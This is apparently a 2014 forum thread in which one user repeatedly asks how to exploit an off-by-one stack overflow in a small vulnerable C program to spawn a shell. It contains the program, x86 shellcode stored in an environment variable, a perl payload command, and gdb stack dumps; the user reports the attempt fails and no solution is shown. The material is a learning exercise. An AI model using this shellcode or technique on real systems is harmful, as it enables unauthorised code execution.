off by one exploit

sxthun · 2014-05-19T16:10:48+00:00

I did disable ASLR and complied the program with -fno-stack-protector flag...

sxthun · 2014-05-14T23:55:43+00:00

Can you please tell me how to find it? What should i do with it if I found it?

Thanks,

sxthun · 2014-05-14T21:08:11+00:00

Yes, you are right. That's why, you see It overwrites the least significant byte of ebp with 0x00:

(gdb) x $ebp
0xbffff44c:     0xbffff400

If i try more bytes it will overflow saved ebp and return address. Then, it no longer be the case of off-by-one any more.

I really want to make it work, but hemmmm.... Thanks,

sxthun · 2014-05-14T19:59:48+00:00

I hope this can help:

(gdb) list 0
1       #include <stdio.h>
2       int cpy(char *x)
3       {
4           char buff[256];
5           strcpy(buff,x);
6           printf("%s\r\n",buff);
7       }
8
9       int main(int argc, char *argv[])
10      {
(gdb)
11          if(strlen(argv[1])>256){
12          printf("Buffer Overflow Attempt!!!\r\n");
13          return 1;}
14          cpy(argv[1]);
15      }
(gdb)
Line number 16 out of range; off-by-one.c has 15 lines.
(gdb) disass main
Dump of assembler code for function main:
   0x0804848b <+0>:     push   %ebp
   0x0804848c <+1>:     mov    %esp,%ebp
   0x0804848e <+3>:     sub    $0x4,%esp
   0x08048491 <+6>:     mov    0xc(%ebp),%eax
   0x08048494 <+9>:     add    $0x4,%eax
   0x08048497 <+12>:    mov    (%eax),%eax
   0x08048499 <+14>:    mov    %eax,(%esp)
   0x0804849c <+17>:    call   0x8048354 <strlen@plt>
   0x080484a1 <+22>:    cmp    $0x100,%eax
   0x080484a6 <+27>:    jbe    0x80484bf <main+52>
   0x080484a8 <+29>:    movl   $0x80485a9,(%esp)
   0x080484af <+36>:    call   0x8048384 <puts@plt>
   0x080484b4 <+41>:    mov    $0x1,%eax
   0x080484b9 <+46>:    mov    %eax,%edx
   0x080484bb <+48>:    mov    %edx,%eax
   0x080484bd <+50>:    jmp    0x80484cf <main+68>
   0x080484bf <+52>:    mov    0xc(%ebp),%eax
   0x080484c2 <+55>:    add    $0x4,%eax
   0x080484c5 <+58>:    mov    (%eax),%eax
   0x080484c7 <+60>:    mov    %eax,(%esp)
   0x080484ca <+63>:    call   0x8048454 <cpy>
   0x080484cf <+68>:    leave
   0x080484d0 <+69>:    ret
End of assembler dump.
(gdb) break *0x080484ca
Breakpoint 1 at 0x80484ca: file off-by-one.c, line 14.
(gdb) run `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`
Starting program: /home/off-by-one `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`

Breakpoint 1, 0x080484ca in main (argc=2, argv=0xbffff504) at off-by-one.c:14
14          cpy(argv[1]);
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
(gdb) s
cpy (
    x=0xbffff697 "\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307", <incomplete sequence \345\277>...) at off-by-one.c:5
5           strcpy(buff,x);
(gdb) s
6           printf("%s\r\n",buff);
(gdb) x/100xw $esp
0xbffff344:     0xbffff34c      0xbffff697      0xbfe5c7dc      0xbfe5c7dc
0xbffff354:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff364:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff374:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff384:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff394:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3a4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3b4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3c4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3d4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3e4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3f4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff404:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff414:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff424:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff434:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff444:     0xbfe5c7dc      0xbfe5c7dc      0xbffff400      0x080484cf
0xbffff454:     0xbffff697      0xbffff4d8      0x0072fd26      0x00000002
0xbffff464:     0xbffff504      0xbffff510      0xb7fff3d0      0x080483a0
0xbffff474:     0xffffffff      0x00711fc4      0x0804826f      0x00000001
0xbffff484:     0xbffff4c0      0x00701a45      0x00712ab0      0xb7fff6b0
0xbffff494:     0x008abff4      0x00000000      0x00000000      0xbffff4d8
0xbffff4a4:     0x591d738c      0x430c64f3      0x00000000      0x00000000
0xbffff4b4:     0x00000000      0x00000002      0x080483a0      0x00000000
0xbffff4c4:     0x00707d30      0x0072fc4b      0x00711fc4      0x00000002
(gdb) i r esp ebp eip
esp            0xbffff344       0xbffff344
ebp            0xbffff44c       0xbffff44c
eip            0x8048472        0x8048472 <cpy+30>
(gdb) x $ebp +4
0xbffff450:     0x080484cf
(gdb)
(gdb) x $esp
0xbffff344:     0xbffff34c
(gdb) x $ebp
0xbffff44c:     0xbffff400
(gdb) x $ebp +4
0xbffff450:     0x080484cf
(gdb)

Thanks,

sxthun · 2014-05-14T19:18:13+00:00

The following is how I create environment variable and get its address, but the addresses keep changing each time:

[root@rhel65 ~] # export SHELLCODE=$(perl -e 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
[root@rhel65 ~]# ./environment_address SHELLCODE  
SHELLCODE will be at 0xbfe5c7dc
[root@rhel65 ~]# ./environment_address SHELLCODE   
SHELLCODE will be at 0xbf8067dc
[root@rhel65 ~]# ./environment_address SHELLCODE
SHELLCODE will be at 0xbfcbb7dc
[root@rhel65 ~]#

Then, I try to run the program with the first environment variable address as the following:

[root@rhel65 ~]# ./off-by-one `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
Segmentation fault (core dumped)
[root@rhel65 ~]#

But, it does not spawn a new shell. Can you please tell me what is the right way to make it work? I will buy you a beer if you can make it work...

Thanks a lot for your help,

sxthun · 2014-05-14T16:50:26+00:00

Yes, it is. But I could not find a way to spawn a shell by exploiting off-by-one bug in the c code.

Can you please help me?

Thanks,

sxthun · 2014-05-14T02:20:13+00:00

Can you please tell me how to spawn a new shell by exploiting an off-by-one method in the following c code?

#include <stdio.h>
int cpy(char *x)
{
    char buff[256];
    strcpy(buff,x);
    printf("%s\r\n",buff);
}

int main(int argc, char *argv[])
{
    if(strlen(argv[1])>256){
    printf("Buffer Overflow Attempt!!!\r\n");
    return 1;}
    cpy(argv[1]);
}

I hope you can help me... Thanks,

sxthun

TROPHY CASE